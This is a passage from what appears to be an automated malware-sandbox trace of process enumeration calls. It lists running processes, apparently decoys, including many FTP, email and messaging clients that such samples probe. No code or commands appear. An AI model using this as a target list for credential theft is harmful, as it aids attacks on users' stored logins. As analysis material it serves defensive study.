cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0278.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0278.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0278.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0278.474] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0278.476] CloseHandle (hObject=0x1018) returned 1 [0278.476] Sleep (dwMilliseconds=0x64) [0278.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0278.720] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.722] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0278.724] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0278.726] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.728] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0278.731] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.733] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0278.735] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0278.737] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0278.743] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.745] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.747] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0278.749] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.751] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.753] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.759] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.762] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.764] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0278.766] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0278.768] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0278.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.772] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0278.774] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0278.784] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0278.786] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0278.788] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0278.790] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.792] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0278.794] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.796] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.798] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.800] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0278.802] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0278.804] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0278.806] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0278.810] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0278.812] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0278.814] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0278.816] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0278.818] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0278.820] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0278.822] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0278.903] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0278.906] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0278.908] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0278.910] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0278.912] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0278.914] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0278.916] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0278.920] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0278.922] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0278.924] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0278.926] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0278.928] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0278.930] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0278.932] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0278.935] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0278.937] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0278.939] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0278.942] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0278.965] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0278.968] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0278.970] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0278.972] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0278.974] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0278.976] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0278.977] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0278.980] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0278.982] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0278.984] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0278.986] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0278.988] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0278.989] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0278.991] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0278.993] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0278.995] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 